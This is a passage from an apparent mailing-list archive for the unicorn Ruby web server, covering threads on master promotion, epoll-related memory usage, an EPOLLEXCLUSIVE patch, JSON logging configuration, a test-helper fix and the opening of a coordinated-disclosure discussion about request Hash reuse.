  provisions to deal with this.  Of course, CoW-aware setups
  (preload_app) will still have the advantage, here.

  Best of all, it could be deterministic, too: instead of
  waiting and hoping 1k random requests will be sufficient
  warmup, developers can tune and mock exactly the requests
  required for warmup.  Of course, a lazy developer could replay 1k
  requests from an old log, too.
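
A sketch of what such a warmup suite could look like with nothing but
rack (the endpoints and placement are made up, of course):

  require 'rack/mock'

  # replay a handful of representative GETs against the already-built app
  def warmup(app)
    mock = Rack::MockRequest.new(app)
    %w(/ /login /search?q=warmup).each { |path| mock.get(path) }
  end

  # e.g. at the end of config.ru after the app is composed, or in an
  # after_fork hook so each worker warms its own caches/JIT:
  #   warmup(app)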


Ultimately (long-term for ruby-core), it would be better to make
JIT (and perhaps even VM cache) results persistent and shareable
across different processes, somehow...  That would help all Ruby
tools, even short-lived CLI tools.  Portable locking would be a
pain, I suppose, but proprietary OSes are always a pain :P

>  4 files changed, 134 insertions(+), 27 deletions(-)
>  create mode 100644 lib/unicorn/promoted_worker.rb

There's some line-wrapping issues caused by your MUA;
I got this from "git am":

  warning: Patch sent with format=flowed; space at the end of lines might be lost.
  Applying: Master promotion with SIGURG (CoW optimization)
  error: corrupt patch at line 14

The git-format-patch(1) manpage has a section for Thunderbird users
which may help.

> --- a/SIGNALS
> +++ b/SIGNALS
> @@ -39,6 +39,10 @@ https://yhbt.net/unicorn/examples/init.sh
>  * WINCH - gracefully stops workers but keep the master running.
>    This will only work for daemonized processes.
> 
> +* URG - promote one of the existing workers as a new master, and gracefully
> +  stop workers.
> +  This will only work for daemonized processes.

Perhaps documenting this as experimental and subject to removal
at any time would make the addition of a major new feature an
easier pill to swallow; but I still think this is better outside
of app servers.

^ permalink raw reply	[relevance 2%]

* Re: DKIM+DMARC enabled (for mailing list subscribers)
  @ 2022-06-22  8:44  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2022-06-22  8:44 UTC (permalink / raw)
  To: unicorn-public

Eric Wong <e@80x24.org> wrote:
> This message is only for SMTP subscribers; not anybody reading
> via HTTP(S), IMAP(S), or NNTP(S).

ditto...

> I had some bounces earlier due to DMARC for two (of many)
> recipients; so I'm adding incompressible header bloat via DKIM :<
> in the hopes that it appeases the big email cartels.

Not sure DMARC is still a problem, but I also got a new IP address
(64.71.152.64 -> 173.255.242.215) for the MX this goes out of
(still dcvr.yhbt.net, same VM, just forced network change from
provider after 14 years...)

^ permalink raw reply	[relevance 3%]

* Re: Memory usage enhancement in unicorn 6.1?
  2022-01-23 16:10  4% Memory usage enhancement in unicorn 6.1? Toshimaru Enomoto
@ 2022-02-16 22:39  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2022-02-16 22:39 UTC (permalink / raw)
  To: Toshimaru Enomoto; +Cc: unicorn-public

Toshimaru Enomoto <me@toshimaru.net> wrote:
> Hi,
> 
> After bumping unicorn from 6.0 to 6.1,
> I observed it reduced memory usage much.
> 
> In production, the memory usage has been almost halved! :0
> Startup memory usage is almost the same, but after a few minutes,
> there is a big difference in the memory usage between v6.0 and v6.1.
> 
> I looked into the cause of this and I found using epoll reduces memory usage.
> https://gist.github.com/toshimaru/c33cfdb2e1b2540ff0481092e8c36745

Quoting the lynx dump of above gist:
> Environment
> 
>      * Ruby 3.1 (ruby:3.1 docker image)
>      * unicorn 6.1
>      * Rails 6.1
> 
> Workload
> 
>      * Run unicorn with 4 worker processes
>      * Request 100 times to unicorn app
> 
> unicorn 6.1 without epoll
> 
>   def prep_readers(readers)
> -   wtr = Unicorn::Waiter.prep_readers(readers)
> -   @timeout *= 500 # to milliseconds for epoll, but halved
> -   wtr
> - rescue
>     require_relative 'select_waiter'
>     @timeout /= 2.0 # halved for IO.select
>     Unicorn::SelectWaiter.new
>   end
> 
> # free -h # before 100 requests
>                total        used        free      shared  buff/cache   available
> Mem:           1.9Gi       805Mi       169Mi       199Mi       1.0Gi       797Mi
> Swap:          1.0Gi       155Mi       868Mi
> 
> # free -h # after 100 requests
>                total        used        free      shared  buff/cache   available
> Mem:           1.9Gi       943Mi        85Mi       192Mi       956Mi       670Mi
> Swap:          1.0Gi       163Mi       860Mi
> 
> unicorn 6.1 with epoll
> 
>   def prep_readers(readers)
>     wtr = Unicorn::Waiter.prep_readers(readers)
>     @timeout *= 500 # to milliseconds for epoll, but halved
>     wtr
> - rescue
> -   require_relative 'select_waiter'
> -   @timeout /= 2.0 # halved for IO.select
> -   Unicorn::SelectWaiter.new
>   end
> 
> # free -h # before 100 requests
>                total        used        free      shared  buff/cache   available
> Mem:           1.9Gi       802Mi       160Mi       192Mi       1.0Gi       811Mi
> Swap:          1.0Gi       163Mi       860Mi
> # free -h # after 100 requests
>                total        used        free      shared  buff/cache   available
> Mem:           1.9Gi       805Mi       156Mi       192Mi       1.0Gi       808Mi
> Swap:          1.0Gi       163Mi       860Mi
> 
> Does anyone observe the same enhancement?

I haven't seen it, nor is it expected...
Note: free(1) may be misleading if other processes are active.

What do the VSZ and RSS columns of "ps aux" say?
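
For example (a rough sketch; assumes a pid file configured at
./unicorn.pid and GNU ps for --ppid):

  # print VSZ/RSS of the unicorn master and each worker
  master = File.read('unicorn.pid').to_i
  puts `ps -o pid,ppid,vsz,rss,comm -p #{master} --ppid #{master}`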

> Or does anyone have an idea why it happened?

Nobody else responded, so I guess not.

How complex is your application w.r.t memory allocations?  The
epoll code path may use fewer allocations and stack than
IO.select, but I figured it'd be lost in the noise since most
applications do a lot more allocations.
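
A rough way to see the difference in isolation (not a real benchmark;
uses the Unicorn::SelectWaiter / Unicorn::Waiter classes shown in the
gist diff above):

  require 'unicorn'
  require 'unicorn/select_waiter'

  IO.pipe do |r, w|
    w.syswrite '.'
    sw = Unicorn::SelectWaiter.new
    before = GC.stat(:total_allocated_objects)
    1000.times { sw.get_readers([], [r], 0) }
    after = GC.stat(:total_allocated_objects)
    puts "IO.select path: #{after - before} allocations"
  end

Swapping in Unicorn::Waiter.prep_readers([r]) and its get_readers on
Linux 4.5+ would show the epoll side of the comparison.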

Btw, please don't use gist or similar services for small text
that can easily be inlined w/o HTML/JS overhead on websites.
Some users download and read mail offline; requiring extra network
round-trips decreases the likelihood your messages will be read.
My mindset as a GNU/Linux hacker remains optimizing everything
for i486 users on dialup :)

^ permalink raw reply	[relevance 0%]

* Memory usage enhancement in unicorn 6.1?
@ 2022-01-23 16:10  4% Toshimaru Enomoto
  2022-02-16 22:39  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Toshimaru Enomoto @ 2022-01-23 16:10 UTC (permalink / raw)
  To: unicorn-public

Hi,

After bumping unicorn from 6.0 to 6.1,
I observed that it reduced memory usage significantly.

In production, the memory usage has been almost halved! :0
Startup memory usage is almost the same, but after a few minutes,
there is a big difference in the memory usage between v6.0 and v6.1.

I looked into the cause of this and I found using epoll reduces memory usage.
https://gist.github.com/toshimaru/c33cfdb2e1b2540ff0481092e8c36745

Does anyone observe the same enhancement?
Or does anyone have an idea why it happened?

Thanks,
Toshi

^ permalink raw reply	[relevance 4%]

* [PATCH 0/3] Ruby 3.1 + doc/URL updates...
@ 2021-12-25 17:41  3% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2021-12-25 17:41 UTC (permalink / raw)
  To: unicorn-public

All tested on some of the same HW I had in 2008/2009 :>

Bozo Doofus For Life (3):
  epollexclusive: remove rb_gc_force_recycle call
  drop Ruby version warning, fix speling errer
  doc: v3 .onion updates, nntp => nntps, minor wording changes

 .olddoc.yml                       | 11 +++++----
 CONTRIBUTORS                      |  8 +++++--
 ISSUES                            | 38 +++++++++++++++----------------
 README                            |  8 +++----
 ext/unicorn_http/epollexclusive.h |  1 -
 ext/unicorn_http/extconf.rb       |  5 ----
 unicorn.gemspec                   |  2 +-
 7 files changed, 36 insertions(+), 37 deletions(-)

^ permalink raw reply	[relevance 3%]

* [PATCH 6/6] use EPOLLEXCLUSIVE on Linux 4.5+
  @ 2021-10-01  3:09  1% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2021-10-01  3:09 UTC (permalink / raw)
  To: unicorn-public

While the capabilities of epoll cannot be fully exploited given
our primitive design, avoiding thundering herd wakeups on larger
SMP machines while below 100% utilization is possible with
Linux 4.5+.

With this change, only one worker wakes up per-connect(2)
(instead of all of them via select(2)), avoiding the thundering
herd effect when the system is mostly idle.

Saturated instances should not notice the difference if they
rarely had multiple workers sleeping in select(2).  This change
benefits non-saturated instances.

With 2 parallel clients and 8 workers on a nominally (:P)
8-core CPU (AMD FX-8320), the uconnect.perl test script
invocation showed a reduction from ~3.4s to ~2.5s when
reading an 11-byte response body:

  echo worker_processes 8 >u.conf.rb
  bs=11 ruby -I lib -I test/ruby-2.5.5/ext/unicorn_http/ bin/unicorn \
    test/benchmark/dd.ru -E none -l /tmp/u.sock -c u.conf.rb
  time perl -I lib -w test/benchmark/uconnect.perl \
    -n 100000 -c 2 /tmp/u.sock

Times improve less as "-c" increases for uconnect.perl (system
noise and timings are inconsistent).  The benefit of this change
should be more noticeable on systems with more workers (and
more cores).

I wanted to use EPOLLET (Edge-Triggered) to further reduce
syscalls, here, (similar to the old select()-avoidance bet) but
that would've either added too much complexity to deduplicate
wakeup sources, or run into the same starvation problem we
solved in April 2020[1].

Since the kernel already has the complexity and deduplication
built-in for Level-Triggered epoll support, we'll just let the
kernel deal with it.

Note: do NOT take this as an example of how epoll should be used
in a sophisticated server.  unicorn is primitive by design and
cannot use threads nor handle multiple clients at once, thus it
only uses epoll in this extremely limited manner.

Linux 4.5+ users will notice a regression of one extra epoll FD
per-worker and at least two epoll watches, so
/proc/sys/fs/epoll/max_user_watches may need to be changed along
with RLIMIT_NOFILE.

This change has also been tested on Linux 3.10.x (CentOS 7.x)
and FreeBSD 11.x to ensure compatibility with systems without
EPOLLEXCLUSIVE.

Various EPOLLEXCLUSIVE discussions over the years:
  https://yhbt.net/lore/lkml/?q=s:EPOLLEXCLUSIVE+d:..20211001&x=t&o=-1

[1] https://yhbt.net/unicorn-public/CAMBWrQ=Yh42MPtzJCEO7XryVknDNetRMuA87irWfqVuLdJmiBQ@mail.gmail.com/
---
 ext/unicorn_http/epollexclusive.h | 125 ++++++++++++++++++++++++++++++
 ext/unicorn_http/extconf.rb       |   1 +
 ext/unicorn_http/unicorn_http.rl  |   3 +
 lib/unicorn/http_server.rb        |  17 +++-
 lib/unicorn/select_waiter.rb      |   6 ++
 t/test-lib.sh                     |   3 +-
 test/unit/test_waiter.rb          |  34 ++++++++
 7 files changed, 184 insertions(+), 5 deletions(-)
 create mode 100644 ext/unicorn_http/epollexclusive.h
 create mode 100644 lib/unicorn/select_waiter.rb
 create mode 100644 test/unit/test_waiter.rb

diff --git a/ext/unicorn_http/epollexclusive.h b/ext/unicorn_http/epollexclusive.h
new file mode 100644
index 0000000..2d2a589
--- /dev/null
+++ b/ext/unicorn_http/epollexclusive.h
@@ -0,0 +1,125 @@
+/*
+ * This is only intended for use inside a unicorn worker, nowhere else.
+ * EPOLLEXCLUSIVE somewhat mitigates the thundering herd problem for
+ * mostly idle processes since we can't use blocking accept4.
+ * This is NOT intended for use with multi-threaded servers, nor
+ * single-threaded multi-client ("C10K") servers or anything advanced
+ * like that.  This use of epoll is only appropriate for a primitive,
+ * single-client, single-threaded servers like unicorn that need to
+ * support SIGKILL timeouts and parent death detection.
+ */
+#if defined(HAVE_EPOLL_CREATE1)
+#  include <sys/epoll.h>
+#  include <errno.h>
+#  include <ruby/io.h>
+#  include <ruby/thread.h>
+#endif /* __linux__ */
+
+#if defined(EPOLLEXCLUSIVE) && defined(HAVE_EPOLL_CREATE1)
+#  define USE_EPOLL (1)
+#else
+#  define USE_EPOLL (0)
+#endif
+
+#if USE_EPOLL
+/*
+ * :nodoc:
+ * returns IO object if EPOLLEXCLUSIVE works and arms readers
+ */
+static VALUE prep_readers(VALUE cls, VALUE readers)
+{
+	long i;
+	int epfd = epoll_create1(EPOLL_CLOEXEC);
+	VALUE epio;
+
+	if (epfd < 0) rb_sys_fail("epoll_create1");
+
+	epio = rb_funcall(cls, rb_intern("for_fd"), 1, INT2NUM(epfd));
+
+	Check_Type(readers, T_ARRAY);
+	for (i = 0; i < RARRAY_LEN(readers); i++) {
+		int rc;
+		struct epoll_event e;
+		rb_io_t *fptr;
+		VALUE io = rb_ary_entry(readers, i);
+
+		e.data.u64 = i; /* the reason readers shouldn't change */
+
+		/*
+		 * I wanted to use EPOLLET here, but maintaining our own
+		 * equivalent of ep->rdllist in Ruby-space doesn't fit
+		 * our design at all (and the kernel already has it's own
+		 * code path for doing it).  So let the kernel spend
+		 * cycles on maintaining level-triggering.
+		 */
+		e.events = EPOLLEXCLUSIVE | EPOLLIN;
+		io = rb_io_get_io(io);
+		GetOpenFile(io, fptr);
+		rc = epoll_ctl(epfd, EPOLL_CTL_ADD, fptr->fd, &e);
+		if (rc < 0) rb_sys_fail("epoll_ctl");
+	}
+	return epio;
+}
+#endif /* USE_EPOLL */
+
+#if USE_EPOLL
+struct ep_wait {
+	struct epoll_event *events;
+	rb_io_t *fptr;
+	int maxevents;
+	int timeout_msec;
+};
+
+static void *do_wait(void *ptr) /* runs w/o GVL */
+{
+	struct ep_wait *epw = ptr;
+
+	return (void *)(long)epoll_wait(epw->fptr->fd, epw->events,
+				epw->maxevents, epw->timeout_msec);
+}
+
+/* :nodoc: */
+/* readers must not change between prepare_readers and get_readers */
+static VALUE
+get_readers(VALUE epio, VALUE ready, VALUE readers, VALUE timeout_msec)
+{
+	struct ep_wait epw;
+	long i, n;
+	VALUE buf;
+
+	Check_Type(ready, T_ARRAY);
+	Check_Type(readers, T_ARRAY);
+	epw.maxevents = RARRAY_LENINT(readers);
+	buf = rb_str_buf_new(sizeof(struct epoll_event) * epw.maxevents);
+	epw.events = (struct epoll_event *)RSTRING_PTR(buf);
+	epio = rb_io_get_io(epio);
+	GetOpenFile(epio, epw.fptr);
+
+	epw.timeout_msec = NUM2INT(timeout_msec);
+	n = (long)rb_thread_call_without_gvl(do_wait, &epw, RUBY_UBF_IO, NULL);
+	if (n < 0) {
+		if (errno != EINTR) rb_sys_fail("epoll_wait");
+		n = 0;
+	}
+	/* Linux delivers events in order received */
+	for (i = 0; i < n; i++) {
+		struct epoll_event *ev = &epw.events[i];
+		VALUE obj = rb_ary_entry(readers, ev->data.u64);
+
+		if (RTEST(obj))
+			rb_ary_push(ready, obj);
+	}
+	rb_str_resize(buf, 0);
+	rb_gc_force_recycle(buf);
+	return Qfalse;
+}
+#endif /* USE_EPOLL */
+
+static void init_epollexclusive(VALUE mUnicorn)
+{
+#if USE_EPOLL
+	VALUE cWaiter = rb_define_class_under(mUnicorn, "Waiter", rb_cIO);
+	rb_define_singleton_method(cWaiter, "prep_readers", prep_readers, 1);
+	rb_define_method(cWaiter, "get_readers", get_readers, 3);
+#endif
+}
diff --git a/ext/unicorn_http/extconf.rb b/ext/unicorn_http/extconf.rb
index 46070a7..13dec41 100644
--- a/ext/unicorn_http/extconf.rb
+++ b/ext/unicorn_http/extconf.rb
@@ -38,4 +38,5 @@
   message("no, needs Ruby 2.6+\n")
 end
 
+have_func('epoll_create1', %w(sys/epoll.h))
 create_makefile("unicorn_http")
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index e934a32..605b23f 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -12,6 +12,7 @@
 #include "common_field_optimization.h"
 #include "global_variables.h"
 #include "c_util.h"
+#include "epollexclusive.h"
 
 void init_unicorn_httpdate(void);
 
@@ -1017,5 +1018,7 @@ void Init_unicorn_http(void)
   id_clear = rb_intern("clear");
 #endif
   id_is_chunked_p = rb_intern("is_chunked?");
+
+  init_epollexclusive(mUnicorn);
 }
 #undef SET_GLOBAL
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 7f33f98..21f2a05 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -685,7 +685,6 @@ def init_worker_process(worker)
     LISTENERS.each { |sock| sock.close_on_exec = true }
 
     worker.user(*user) if user.kind_of?(Array) && ! worker.switched
-    self.timeout /= 2.0 # halve it for select()
     @config = nil
     build_app! unless preload_app
     @after_fork = @listener_opts = @orig_app = nil
@@ -705,11 +704,22 @@ def reopen_worker_logs(worker_nr)
     exit!(77) # EX_NOPERM in sysexits.h
   end
 
+  def prep_readers(readers)
+    wtr = Unicorn::Waiter.prep_readers(readers)
+    @timeout *= 500 # to milliseconds for epoll, but halved
+    wtr
+  rescue
+    require_relative 'select_waiter'
+    @timeout /= 2.0 # halved for IO.select
+    Unicorn::SelectWaiter.new
+  end
+
   # runs inside each forked worker, this sits around and waits
   # for connections and doesn't die until the parent dies (or is
   # given a INT, QUIT, or TERM signal)
   def worker_loop(worker)
     readers = init_worker_process(worker)
+    waiter = prep_readers(readers)
     reopen = false
 
     # this only works immediately if the master sent us the signal
@@ -722,8 +732,7 @@ def worker_loop(worker)
     begin
       reopen = reopen_worker_logs(worker.nr) if reopen
       worker.tick = time_now.to_i
-      tmp = ready.dup
-      while sock = tmp.shift
+      while sock = ready.shift
         # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
         # but that will return false
         if client = sock.kgio_tryaccept
@@ -735,7 +744,7 @@ def worker_loop(worker)
 
       # timeout so we can .tick and keep parent from SIGKILL-ing us
       worker.tick = time_now.to_i
-      ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
+      waiter.get_readers(ready, readers, @timeout)
     rescue => e
       redo if reopen && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
diff --git a/lib/unicorn/select_waiter.rb b/lib/unicorn/select_waiter.rb
new file mode 100644
index 0000000..cb84aab
--- /dev/null
+++ b/lib/unicorn/select_waiter.rb
@@ -0,0 +1,6 @@
+# fallback for non-Linux and Linux <4.5 systems w/o EPOLLEXCLUSIVE
+class Unicorn::SelectWaiter # :nodoc:
+  def get_readers(ready, readers, timeout) # :nodoc:
+    ret = IO.select(readers, nil, nil, timeout) and ready.replace(ret[0])
+  end
+end
diff --git a/t/test-lib.sh b/t/test-lib.sh
index 7f97958..e70d0c6 100644
--- a/t/test-lib.sh
+++ b/t/test-lib.sh
@@ -94,7 +94,8 @@ check_stderr () {
 	set +u
 	_r_err=${1-${r_err}}
 	set -u
-	if grep -v $T $_r_err | grep -i Error
+	if grep -v $T $_r_err | grep -i Error | \
+		grep -v NameError.*Unicorn::Waiter
 	then
 		die "Errors found in $_r_err"
 	elif grep SIGKILL $_r_err
diff --git a/test/unit/test_waiter.rb b/test/unit/test_waiter.rb
new file mode 100644
index 0000000..0995de2
--- /dev/null
+++ b/test/unit/test_waiter.rb
@@ -0,0 +1,34 @@
+require 'test/unit'
+require 'unicorn'
+require 'unicorn/select_waiter'
+class TestSelectWaiter < Test::Unit::TestCase
+
+  def test_select_timeout # n.b. this is level-triggered
+    sw = Unicorn::SelectWaiter.new
+    IO.pipe do |r,w|
+      sw.get_readers(ready = [], [r], 0)
+      assert_equal [], ready
+      w.syswrite '.'
+      sw.get_readers(ready, [r], 1000)
+      assert_equal [r], ready
+      sw.get_readers(ready, [r], 0)
+      assert_equal [r], ready
+    end
+  end
+
+  def test_linux # ugh, also level-triggered, unlikely to change
+    IO.pipe do |r,w|
+      wtr = Unicorn::Waiter.prep_readers([r])
+      wtr.get_readers(ready = [], [r], 0)
+      assert_equal [], ready
+      w.syswrite '.'
+      wtr.get_readers(ready = [], [r], 1000)
+      assert_equal [r], ready
+      wtr.get_readers(ready = [], [r], 1000)
+      assert_equal [r], ready, 'still ready (level-triggered :<)'
+      assert_nil wtr.close
+    end
+  rescue SystemCallError => e
+    warn "#{e.message} (#{e.class})"
+  end if Unicorn.const_defined?(:Waiter)
+end

^ permalink raw reply related	[relevance 1%]

* Re: Formatting unicorn logs in json format for $stderr
  2021-07-06 10:41  0% ` Eric Wong
@ 2021-07-06 23:21  0%   ` Cenon Del Rosario
  0 siblings, 0 replies; 200+ results
From: Cenon Del Rosario @ 2021-07-06 23:21 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

> I suspect that needs "logger()" around it, like so:
>     logger(Logger.new($stderr).tap do |newlgr|
>       newlgr.formatter = JsonLogFormatter.new
>     end)

Sorry for incomplete code snippets but yes I do have this (I was doing
it for either stdout or stderr) and it did not make a difference.

On Tue, 6 Jul 2021 at 20:41, Eric Wong <e@80x24.org> wrote:
>
> Cenon Del Rosario <cdelrosario@publishing.nine.com.au> wrote:
> > Hi,
> >
> > I am using rails 3.2.22 / ruby 2.1.8 and am trying to reformat the
> > unicorn log output from stderr into json format and have had partial
> > success.
> >
> > I have a basic json formatter:
> > class JsonLogFormatter < Logger::Formatter
> >   def call(severity, datetime, progname, msg)
> >     log_msg = {
> >       time: "#{datetime}",
> >       severity: "#{severity}",
> >       source: "#{progname}"
> >     }
> >     msg.is_a?(Hash) ? log_msg.merge!(msg) : log_msg.merge!(message: "#{msg}")
> >     "#{log_msg.to_json}\n"
> >   end
> > end
> >
> > I have this in my unicorn config:
> > Logger.new($stderr).tap do |newlgr|
> >   newlgr.formatter = JsonLogFormatter.new
> > end
>
> I suspect that needs "logger()" around it, like so:
>
>     logger(Logger.new($stderr).tap do |newlgr|
>       newlgr.formatter = JsonLogFormatter.new
>     end)
>
> cf. https://yhbt.net/unicorn/Unicorn/Configurator.html#method-i-logger
>
> > For the most part it works and I get the stdout and stderr in json but
> > I also see some other non-json formatted messages, for example:
> > {"time":"2021-07-06 17:14:01
> > +1000","severity":"INFO","source":"","message":"Started GET \"/admin\"
> > for 127.0.0.1 at 2021-07-06 17:14:01 +1000"}
> > 127.0.0.1 - - [06/Jul/2021 17:14:01] "GET /admin HTTP/1.1" 301 102 0.4243
>
> I suspect one of those lines could be the result of
> Rack::CommonLogger from RACK_ENV=deployment or similar
> (which matched "rackup" defaults back in 2009).
>
> Personally, I always used something non-standard like "RACK_ENV=none"
> to disable all default Rack middleware (--no-default-middleware
> exists nowadays, too).
>
> > It seems that rails logs are working and then the unicorn process
> > itself is outputting its own logs because I can see duplicates of the
> > same log message one in json and the other in plain text.
> >
> > Just want to know if there is a way to get this working consistently?
>
> I've never used the "logger" directive much myself; maybe others
> here can chime in with experience using non-standard loggers.

^ permalink raw reply	[relevance 0%]

* Re: Formatting unicorn logs in json format for $stderr
  2021-07-06  7:22  2% Formatting unicorn logs in json format for $stderr Cenon Del Rosario
@ 2021-07-06 10:41  0% ` Eric Wong
  2021-07-06 23:21  0%   ` Cenon Del Rosario
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2021-07-06 10:41 UTC (permalink / raw)
  To: Cenon Del Rosario; +Cc: unicorn-public

Cenon Del Rosario <cdelrosario@publishing.nine.com.au> wrote:
> Hi,
> 
> I am using rails 3.2.22 / ruby 2.1.8 and am trying to reformat the
> unicorn log output from stderr into json format and have had partial
> success.
> 
> I have a basic json formatter:
> class JsonLogFormatter < Logger::Formatter
>   def call(severity, datetime, progname, msg)
>     log_msg = {
>       time: "#{datetime}",
>       severity: "#{severity}",
>       source: "#{progname}"
>     }
>     msg.is_a?(Hash) ? log_msg.merge!(msg) : log_msg.merge!(message: "#{msg}")
>     "#{log_msg.to_json}\n"
>   end
> end
> 
> I have this in my unicorn config:
> Logger.new($stderr).tap do |newlgr|
>   newlgr.formatter = JsonLogFormatter.new
> end

I suspect that needs "logger()" around it, like so:

    logger(Logger.new($stderr).tap do |newlgr|
      newlgr.formatter = JsonLogFormatter.new
    end)

cf. https://yhbt.net/unicorn/Unicorn/Configurator.html#method-i-logger

> For the most part it works and I get the stdout and stderr in json but
> I also see some other non-json formatted messages, for example:
> {"time":"2021-07-06 17:14:01
> +1000","severity":"INFO","source":"","message":"Started GET \"/admin\"
> for 127.0.0.1 at 2021-07-06 17:14:01 +1000"}
> 127.0.0.1 - - [06/Jul/2021 17:14:01] "GET /admin HTTP/1.1" 301 102 0.4243

I suspect one of those lines could be the result of
Rack::CommonLogger from RACK_ENV=deployment or similar
(which matched "rackup" defaults back in 2009).

Personally, I always used something non-standard like "RACK_ENV=none"
to disable all default Rack middleware (--no-default-middleware
exists nowadays, too).
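
Putting the two suggestions together, an untested sketch of the
unicorn config:

  # unicorn.conf.rb -- sketch only; JsonLogFormatter is the class from
  # the original message and must already be loadable here
  require 'logger'
  require 'json_log_formatter' # hypothetical file on the load path

  logger(Logger.new($stderr).tap do |newlgr|
    newlgr.formatter = JsonLogFormatter.new
  end)

Starting unicorn with -N (--no-default-middleware) or RACK_ENV=none
then keeps rackup from wrapping the app in Rack::CommonLogger and
emitting its plain-text access lines.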

> It seems that rails logs are working and then the unicorn process
> itself is outputting its own logs because I can see duplicates of the
> same log message one in json and the other in plain text.
> 
> Just want to know if there is a way to get this working consistently?

I've never used the "logger" directive much myself; maybe others
here can chime in with experience using non-standard loggers.

^ permalink raw reply	[relevance 0%]

* Formatting unicorn logs in json format for $stderr
@ 2021-07-06  7:22  2% Cenon Del Rosario
  2021-07-06 10:41  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Cenon Del Rosario @ 2021-07-06  7:22 UTC (permalink / raw)
  To: unicorn-public

Hi,

I am using rails 3.2.22 / ruby 2.1.8 and am trying to reformat the
unicorn log output from stderr into json format and have had partial
success.

I have a basic json formatter:
class JsonLogFormatter < Logger::Formatter
  def call(severity, datetime, progname, msg)
    log_msg = {
      time: "#{datetime}",
      severity: "#{severity}",
      source: "#{progname}"
    }
    msg.is_a?(Hash) ? log_msg.merge!(msg) : log_msg.merge!(message: "#{msg}")
    "#{log_msg.to_json}\n"
  end
end

I have this in my unicorn config:
Logger.new($stderr).tap do |newlgr|
  newlgr.formatter = JsonLogFormatter.new
end

I have this in my application.rb:
Logger.new(STDOUT).tap do |logr|
  JsonLogFormatter.new.tap do |frmtr|
    logr.formatter = frmtr
    Rails.logger = config.logger = logr
  end
end

For the most part it works and I get the stdout and stderr in json but
I also see some other non-json formatted messages, for example:
{"time":"2021-07-06 17:14:01
+1000","severity":"INFO","source":"","message":"Started GET \"/admin\"
for 127.0.0.1 at 2021-07-06 17:14:01 +1000"}
127.0.0.1 - - [06/Jul/2021 17:14:01] "GET /admin HTTP/1.1" 301 102 0.4243

It seems that rails logs are working and then the unicorn process
itself is outputting its own logs because I can see duplicates of the
same log message one in json and the other in plain text.

Just want to know if there is a way to get this working consistently?

Thank you,
Cenon Del Rosario

^ permalink raw reply	[relevance 2%]

* [PATCH] test/test_helper: only unlink redirected logs from parent
@ 2021-03-13  2:08  3% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2021-03-13  2:08 UTC (permalink / raw)
  To: unicorn-public

We don't want at_exit firing in child processes and never wanted
it.  This is apparently a long standing bug in the tests that
only started causing test_worker_dies_on_dead_master failures
for me.  I assume it's only showing up now for me due to kernel
scheduler changes, since I've been using the same 4-core CPU for
~11 years, now.
---
 test/test_helper.rb | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/test/test_helper.rb b/test/test_helper.rb
index 974d2f2..ba5ef16 100644
--- a/test/test_helper.rb
+++ b/test/test_helper.rb
@@ -42,6 +42,7 @@
 def redirect_test_io
   orig_err = STDERR.dup
   orig_out = STDOUT.dup
+  rdr_pid = $$
   new_out = File.open("test_stdout.#$$.log", "a")
   new_err = File.open("test_stderr.#$$.log", "a")
   new_out.sync = new_err.sync = true
@@ -59,8 +60,10 @@ def redirect_test_io
   STDERR.sync = STDOUT.sync = true
 
   at_exit do
-    File.unlink(new_out.path) rescue nil
-    File.unlink(new_err.path) rescue nil
+    if rdr_pid == $$
+      File.unlink(new_out.path) rescue nil
+      File.unlink(new_err.path) rescue nil
+    end
   end
 
   begin

^ permalink raw reply related	[relevance 3%]

* Re: Potential Unicorn vulnerability
       [not found]       ` <7F6FD017-7802-4871-88A3-1E03D26D967C@github.com>
@ 2021-03-12  9:41  1%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2021-03-12  9:41 UTC (permalink / raw)
  To: Dirkjan Bussink; +Cc: John Crepezzi, Kevin Sawicki, unicorn-public

[-- Attachment #1: Type: text/plain, Size: 6397 bytes --]

Dirkjan Bussink <dbussink@github.com> wrote:
> Hello Eric,
> 
> > On 11 Mar 2021, at 04:02, Eric Wong <normalperson@yhbt.net> wrote:
> > 
> > Thanks for reaching out.  Fwiw, I prefer if everything were made
> > public right away, but I'll leave it up to you if you're not
> > comfortable with it.
> > 
> > I don't know much about security, anyways; and don't like
> > classifying bugs (or classifying anything)...
> 
> We reached out privately first out of care and to follow best practices
> around coordinated disclosure, in case you considered this a security
> vulnerability. We have no objections to moving this to the public mailing
> list. We are viewing this patch as a proactive hardening against race
> conditions more so than a vulnerability. 

OK, I'm adding unicorn-public@yhbt.net to the Cc: of this mail.

Personally, I prefer everything be reported publicly ASAP.
There's a constant threat of power/network failures from
disasters and such that could cause messages to be delayed
too long or indefinitely.

> We are also reaching out to a private Rails Security coordination channel
> that we’re a part of to raise awareness of this behavior so other Unicorn
> users in this group can look for similar issues in their code. 

OK.

> To move this discussion to the public list, would you prefer that you move
> this thread publicly, or that we resend the message or forward it to the
> public mailing list? 

Attached are the initial two (previously private) emails in this
thread, so no need to resend.  They have the correct
message/rfc822 MIME type set so they should be readable from
most MUAs and mail archives.

> > Ouch, so the hijack check we had in HttpParser_clear didn't fire...
> 
> Yes, to our understanding it only would fire if explicitly set and that
> doesn’t happen here.
> 
> >> While we understand and appreciate that Unicorn is not a multi-threaded web
> >> server, it feels like using the same `Hash` object between requests
> >> introduces the chance that a dependency like an external gem may use threads
> >> and thus potentially leak information between requests.
> > 
> > Yes, there's likely problems in trying to use threads with a
